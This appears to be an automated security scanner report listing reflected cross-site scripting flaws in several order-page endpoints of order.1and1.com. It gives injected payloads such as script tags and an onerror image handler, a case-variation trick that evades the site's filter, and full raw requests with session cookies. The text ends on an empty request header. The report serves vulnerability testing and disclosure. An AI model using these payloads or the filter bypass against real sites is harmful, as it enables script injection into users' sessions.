GET /xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureDatabaseDatabase is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureDatabaseDatabase. The payload 9ead5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>428693372d0 was submitted in the REST URL parameter 3. This input was returned as 9ead5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>428693372d0 in a subsequent request for the URL /xml/order/FeatureDatabaseDatabase.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureDatabaseDatabase9ead5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>428693372d0;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureDatabaseDatabase;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureEmailEmail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureEmailEmail. The payload f6a45</ScRiPt%20>ca9d9974f55 was submitted in the REST URL parameter 3. This input was returned as f6a45</ScRiPt >ca9d9974f55 in a subsequent request for the URL /xml/order/FeatureEmailEmail.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureEmailEmailf6a45</ScRiPt%20>ca9d9974f55;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureEmailEmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureEmailWebmail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureEmailWebmail. The payload 45663</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>f29e6be5a86 was submitted in the REST URL parameter 3. This input was returned as 45663</ScRiPt ><ScRiPt>alert(1)</ScRiPt>f29e6be5a86 in a subsequent request for the URL /xml/order/FeatureEmailWebmail.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureEmailWebmail45663</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>f29e6be5a86;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureEmailWebmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureGuaranteeMoneyback is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureGuaranteeMoneyback. The payload 83c9e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>eed4e62047d was submitted in the REST URL parameter 3. This input was returned as 83c9e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>eed4e62047d in a subsequent request for the URL /xml/order/FeatureGuaranteeMoneyback.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureGuaranteeMoneyback83c9e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>eed4e62047d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureGuaranteeMoneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureMarketingCtrCitysearch is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureMarketingCtrCitysearch. The payload 649d3</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>b5a1ad5a333 was submitted in the REST URL parameter 3. This input was returned as 649d3</ScRiPt ><img src=a onerror=alert(1)>b5a1ad5a333 in a subsequent request for the URL /xml/order/FeatureMarketingCtrCitysearch.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureMarketingCtrCitysearch649d3</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>b5a1ad5a333;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureMarketingCtrCitysearch;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureMarketingCtrStat is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureMarketingCtrStat. The payload ccb50</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>3147a128d82 was submitted in the REST URL parameter 3. This input was returned as ccb50</ScRiPt ><img src=a onerror=alert(1)>3147a128d82 in a subsequent request for the URL /xml/order/FeatureMarketingCtrStat.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureMarketingCtrStatccb50</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>3147a128d82;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureMarketingCtrStat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingCgi is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingCgi. The payload 31b1b</ScRiPt%20>c2edeb9151d was submitted in the REST URL parameter 3. This input was returned as 31b1b</ScRiPt >c2edeb9151d in a subsequent request for the URL /xml/order/FeatureSite-buildingCgi.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureSite-buildingCgi31b1b</ScRiPt%20>c2edeb9151d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureSite-buildingCgi;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingDsc is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingDsc. The payload 5a570</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>5c34db446ac was submitted in the REST URL parameter 3. This input was returned as 5a570</ScRiPt ><ScRiPt>alert(1)</ScRiPt>5c34db446ac in a subsequent request for the URL /xml/order/FeatureSite-buildingDsc.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureSite-buildingDsc5a570</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>5c34db446ac;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
